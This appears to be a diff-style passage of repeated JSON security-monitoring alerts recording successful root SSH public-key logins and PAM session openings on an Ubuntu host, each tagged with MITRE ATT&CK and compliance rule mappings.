+{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication 